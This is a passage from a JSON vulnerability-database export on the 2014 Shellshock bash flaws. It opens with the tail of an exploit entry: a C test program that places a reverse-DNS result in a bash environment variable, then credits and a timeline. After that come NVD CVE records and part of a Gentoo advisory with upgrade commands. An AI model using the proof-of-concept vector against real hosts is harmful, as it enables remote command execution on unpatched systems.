<unistd.h>\r\n #include <netinet/in.h>\r\n\r\n int main(int argc, char ** argv) {\r\n struct in_addr addr;\r\n struct sockaddr_in sa;\r\n char host[1024];\r\n\r\n assert(argc==2);\r\n assert(inet_aton(argv[1],&addr) == 1);\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_addr = addr;\r\n\r\n assert(0==getnameinfo((struct sockaddr *)&sa, sizeof sa,\r\n host, sizeof host, NULL, 0, NI_NAMEREQD));\r\n\r\n printf(\"Lookup result: %s\\n\\n\", host); \r\n\r\n assert(setenv(\"REMOTE_HOST\",host,1) == 0);\r\n execl(\"/bin/bash\",NULL);\r\n }\r\n\r\n\r\nCredits and timeline\r\n\r\nThe flaw was found and reported by Stephane Chazelas (see CVE-2014-6271\r\nfor details). Dirk-Willem van Gulik (dirkx(at)webweaving.org) found\r\nthe DNS reverse lookup vector.\r\n\r\n09-04-2011 first reported.\r\n2011, 2014 issue verified on various embedded/firewall/waas\r\n systems and reported to vendors. \r\n??-09-2014 Apple specific exploited seen.\r\n11-10-2014 Apple confirms that with DL1769 in place that\r\n \"The issue that remains, while it raises \r\n interesting questions, is not a security \r\n issue in and of itself.\"\r\n\r\n* Common Vulnerability Scoring (Version 2) and vector:\r\n\r\nSee CVE-2014-6271.\r\n\r\n1:https://github.com/mubix/shellshocker-pocs/blob/master/README.md)\r\n1.10 / : 1726 $\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22754"}], "cve": [{"lastseen": "2021-02-02T06:14:33", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "edition": 4, "cvss3": {}, "published": "2014-09-30T10:55:00", "title": "CVE-2014-6278", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6278"], "modified": "2018-08-09T01:29:00", "cpe": ["cpe:/a:gnu:bash:2.02", "cpe:/a:gnu:bash:1.14.4", "cpe:/a:gnu:bash:2.0", "cpe:/a:gnu:bash:3.1", "cpe:/a:gnu:bash:1.14.6", "cpe:/a:gnu:bash:3.0", "cpe:/a:gnu:bash:3.2", "cpe:/a:gnu:bash:3.2.48", "cpe:/a:gnu:bash:4.3", "cpe:/a:gnu:bash:2.02.1", "cpe:/a:gnu:bash:3.0.16", "cpe:/a:gnu:bash:1.14.0", "cpe:/a:gnu:bash:2.01", "cpe:/a:gnu:bash:1.14.7", "cpe:/a:gnu:bash:4.2", "cpe:/a:gnu:bash:4.0", "cpe:/a:gnu:bash:2.04", "cpe:/a:gnu:bash:2.05", "cpe:/a:gnu:bash:1.14.2", "cpe:/a:gnu:bash:4.1", "cpe:/a:gnu:bash:1.14.5", "cpe:/a:gnu:bash:2.03", "cpe:/a:gnu:bash:1.14.1", "cpe:/a:gnu:bash:1.14.3", "cpe:/a:gnu:bash:2.01.1"], "id": "CVE-2014-6278", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:33", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.", "edition": 4, "cvss3": {}, "published": "2014-09-27T22:55:00", "title": "CVE-2014-6277", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6277"], "modified": "2018-08-09T01:29:00", "cpe": ["cpe:/a:gnu:bash:2.02", "cpe:/a:gnu:bash:1.14.4", "cpe:/a:gnu:bash:2.0", "cpe:/a:gnu:bash:3.1", "cpe:/a:gnu:bash:1.14.6", "cpe:/a:gnu:bash:3.0", "cpe:/a:gnu:bash:3.2", "cpe:/a:gnu:bash:3.2.48", "cpe:/a:gnu:bash:4.3", "cpe:/a:gnu:bash:2.02.1", "cpe:/a:gnu:bash:3.0.16", "cpe:/a:gnu:bash:1.14.0", "cpe:/a:gnu:bash:2.01", "cpe:/a:gnu:bash:1.14.7", "cpe:/a:gnu:bash:4.2", "cpe:/a:gnu:bash:4.0", "cpe:/a:gnu:bash:2.04", "cpe:/a:gnu:bash:2.05", "cpe:/a:gnu:bash:1.14.2", "cpe:/a:gnu:bash:4.1", "cpe:/a:gnu:bash:1.14.5", "cpe:/a:gnu:bash:2.03", "cpe:/a:gnu:bash:1.14.1", "cpe:/a:gnu:bash:1.14.3", "cpe:/a:gnu:bash:2.01.1"], "id": "CVE-2014-6277", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the \"redir_stack\" issue.", "edition": 4, "cvss3": {}, "published": "2014-09-28T19:55:00", "title": "CVE-2014-7186", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7186"], "modified": "2018-10-09T19:52:00", "cpe": ["cpe:/a:gnu:bash:2.02", "cpe:/a:gnu:bash:1.14.4", "cpe:/a:gnu:bash:2.0", "cpe:/a:gnu:bash:3.1", "cpe:/a:gnu:bash:1.14.6", "cpe:/a:gnu:bash:3.0", "cpe:/a:gnu:bash:3.2", "cpe:/a:gnu:bash:3.2.48", "cpe:/a:gnu:bash:4.3", "cpe:/a:gnu:bash:2.02.1", "cpe:/a:gnu:bash:3.0.16", "cpe:/a:gnu:bash:1.14.0", "cpe:/a:gnu:bash:2.01", "cpe:/a:gnu:bash:1.14.7", "cpe:/a:gnu:bash:4.2", "cpe:/a:gnu:bash:4.0", "cpe:/a:gnu:bash:2.04", "cpe:/a:gnu:bash:2.05", "cpe:/a:gnu:bash:1.14.2", "cpe:/a:gnu:bash:4.1", "cpe:/a:gnu:bash:1.14.5", "cpe:/a:gnu:bash:2.03", "cpe:/a:gnu:bash:1.14.1", "cpe:/a:gnu:bash:1.14.3", "cpe:/a:gnu:bash:2.01.1"], "id": "CVE-2014-7186", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the \"word_lineno\" issue.", "edition": 4, "cvss3": {}, "published": "2014-09-28T19:55:00", "title": "CVE-2014-7187", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7187"], "modified": "2018-10-09T19:52:00", "cpe": ["cpe:/a:gnu:bash:2.02", "cpe:/a:gnu:bash:1.14.4", "cpe:/a:gnu:bash:2.0", "cpe:/a:gnu:bash:3.1", "cpe:/a:gnu:bash:1.14.6", "cpe:/a:gnu:bash:3.0", "cpe:/a:gnu:bash:3.2", "cpe:/a:gnu:bash:3.2.48", "cpe:/a:gnu:bash:4.3", "cpe:/a:gnu:bash:2.02.1", "cpe:/a:gnu:bash:3.0.16", "cpe:/a:gnu:bash:1.14.0", "cpe:/a:gnu:bash:2.01", "cpe:/a:gnu:bash:1.14.7", "cpe:/a:gnu:bash:4.2", "cpe:/a:gnu:bash:4.0", "cpe:/a:gnu:bash:2.04", "cpe:/a:gnu:bash:2.05", "cpe:/a:gnu:bash:1.14.2", "cpe:/a:gnu:bash:4.1", "cpe:/a:gnu:bash:1.14.5", "cpe:/a:gnu:bash:2.03", "cpe:/a:gnu:bash:1.14.1", "cpe:/a:gnu:bash:1.14.3", "cpe:/a:gnu:bash:2.01.1"], "id": "CVE-2014-7187", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.", "edition": 4, "cvss3": {}, "published": "2014-09-25T01:55:00", "title": "CVE-2014-7169", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2018-11-30T21:29:00", "cpe": ["cpe:/a:gnu:bash:2.02", "cpe:/a:gnu:bash:1.14.4", "cpe:/a:gnu:bash:2.0", "cpe:/a:gnu:bash:3.1", "cpe:/a:gnu:bash:1.14.6", "cpe:/a:gnu:bash:3.0", "cpe:/a:gnu:bash:3.2", "cpe:/a:gnu:bash:3.2.48", "cpe:/a:gnu:bash:4.3", "cpe:/a:gnu:bash:2.02.1", "cpe:/a:gnu:bash:3.0.16", "cpe:/a:gnu:bash:1.14.0", "cpe:/a:gnu:bash:2.01", "cpe:/a:gnu:bash:1.14.7", "cpe:/a:gnu:bash:4.2", "cpe:/a:gnu:bash:4.0", "cpe:/a:gnu:bash:2.04", "cpe:/a:gnu:bash:2.05", "cpe:/a:gnu:bash:1.14.2", "cpe:/a:gnu:bash:4.1", "cpe:/a:gnu:bash:1.14.5", "cpe:/a:gnu:bash:2.03", "cpe:/a:gnu:bash:1.14.1", "cpe:/a:gnu:bash:1.14.3", "cpe:/a:gnu:bash:2.01.1"], "id": "CVE-2014-7169", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T23:49:28", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-09-24T18:48:00", "title": "CVE-2014-6271", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271"], "modified": "2021-02-01T21:38:00", "cpe": ["cpe:/a:gnu:bash:2.02", "cpe:/a:gnu:bash:1.14.4", "cpe:/a:gnu:bash:2.0", "cpe:/a:gnu:bash:3.1", "cpe:/a:gnu:bash:1.14.6", "cpe:/a:gnu:bash:3.0", "cpe:/a:gnu:bash:3.2", "cpe:/a:gnu:bash:3.2.48", "cpe:/a:gnu:bash:4.3", "cpe:/a:gnu:bash:2.02.1", "cpe:/a:gnu:bash:3.0.16", "cpe:/a:gnu:bash:1.14.0", "cpe:/a:gnu:bash:2.01", "cpe:/a:gnu:bash:1.14.7", "cpe:/a:gnu:bash:4.2", "cpe:/a:gnu:bash:4.0", "cpe:/a:gnu:bash:2.04", "cpe:/a:gnu:bash:2.05", "cpe:/a:gnu:bash:1.14.2", "cpe:/a:gnu:bash:4.1", "cpe:/a:gnu:bash:1.14.5", "cpe:/a:gnu:bash:2.03", "cpe:/a:gnu:bash:1.14.1", "cpe:/a:gnu:bash:1.14.3", "cpe:/a:gnu:bash:2.01.1"], "id": "CVE-2014-6271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-7186"], "edition": 1, "description": "### Background\n\nBash is the standard GNU Bourne Again SHell.\n\n### Description\n\nFlorian Weimer, Todd Sabin, Michal Zalewski et al. discovered further parsing flaws in Bash. The unaffected Gentoo packages listed in this GLSA contain the official patches to fix the issues tracked as CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the official patch known as \u201cfunction prefix patch\u201d is included which prevents the exploitation of CVE-2014-6278. \n\n### Impact\n\nA remote attacker could exploit these vulnerabilities to execute arbitrary commands or cause a Denial of Service condition via various vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Bash 3.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-3.1_p22:3.1\"\n \n\nAll Bash 3.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose 